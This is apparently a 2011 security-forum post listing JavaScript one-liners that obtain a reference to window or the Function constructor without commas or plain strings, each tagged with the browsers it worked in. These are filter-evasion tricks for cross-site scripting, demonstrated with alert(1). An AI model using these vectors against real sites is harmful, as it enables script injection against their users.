Re: Tricks for getting a reference to window
Date: June 20, 2011 05:09PM
I'm not sure what everyone else is using these tricks for, but I found it to be a great way to evaluate octal strings. I needed some new tricks because our old favorite trick "[],[]['sort']()" is not working in the lastest versions of FireFox, and I was also in a situation where comma was not allowed.
So I grabbed some snippets of code from here and built a few code samples. Anything enclosed in '' can be replaced with it's octal equivalent.
'\141\154\145\162\164' = 'alert'
$['__parent__']['alert'](1) //Firebug Console in FF3.6 Only
(0,[]['sort'])()['alert'](1) //FF3.6, Chrome, IE9
1.['__parent__']['alert'](1) //FF3.6
([],[]['sort'])()['alert'](1) //Chrome, FF3.6, IE9
/_/['__parent__']['alert'](1) //FF3.6
$['constructor']('alert(1)')() //JQuery Chrome, IE8, IE9, FF4, FF3.6
(0,[]['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0,{}['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0||$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1&&$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1?$['valueOf']:0)()['alert'](1) //Jquery Chrome, IE9
[]['sort']['apply']()['alert'](1) //Chrome, FF3.6
(0,/0/(/0/)['sort'])()['alert'](1) //Chrome, FF3.6
('',/\//['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
(1?['']['valueOf']:0)()['alert'](1) //Chrome, IE9
''['big']['constructor']('alert(1)')() //FF4, FF3.6 IE8, IE9, Webkit
[]['map']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE9
(1&&[]['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
/_/['test']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE8, IE9
(0||['']['valueOf'])()['alert'](1) //FF3.6, IE9, Chrome
(0.['valueOf'])['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
1.['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
(0)['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
$='@mozilla.org/js/function';$::['alert'](1) //FF3.6, FF4
